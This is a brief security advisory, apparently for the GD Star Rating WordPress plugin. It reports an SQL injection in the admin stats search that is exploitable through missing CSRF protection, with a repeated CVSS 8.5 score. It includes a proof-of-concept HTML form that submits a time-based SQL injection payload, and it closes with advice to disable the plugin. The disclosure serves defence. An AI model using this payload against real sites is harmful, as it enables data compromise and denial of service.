CVSS Summary
Score | 8.5 High |
---|---|
Vector | Network |
Complexity | Low |
Authentication | Single |
Confidentiality | Complete |
Integrity | None |
Availability | Complete |
Last revised:
This plugin is vulnerable to SQL injection. Carrying out an SQL injection requires access to an administrator account. However, the form contains no CSRF protection so an attacker may not need direct access to an account to perform denial of service or to compromise sensitive data.
Current state: Reported
Score | 8.5 High |
---|---|
Vector | Network |
Complexity | Low |
Authentication | Single |
Confidentiality | Complete |
Integrity | None |
Availability | Complete |
Proof of concept (see code/adm/db.php at line 154):
<form action="http://localhost/wp-admin/admin.php?page=gd-star-rating-stats" method="POST"> <input type="text" name="s" value="' and sleep(5) = '"> <input type="text" name="gdsr_search" value="Search Posts"> <input type="submit"> </form>
Disable the plugin until a fix is released.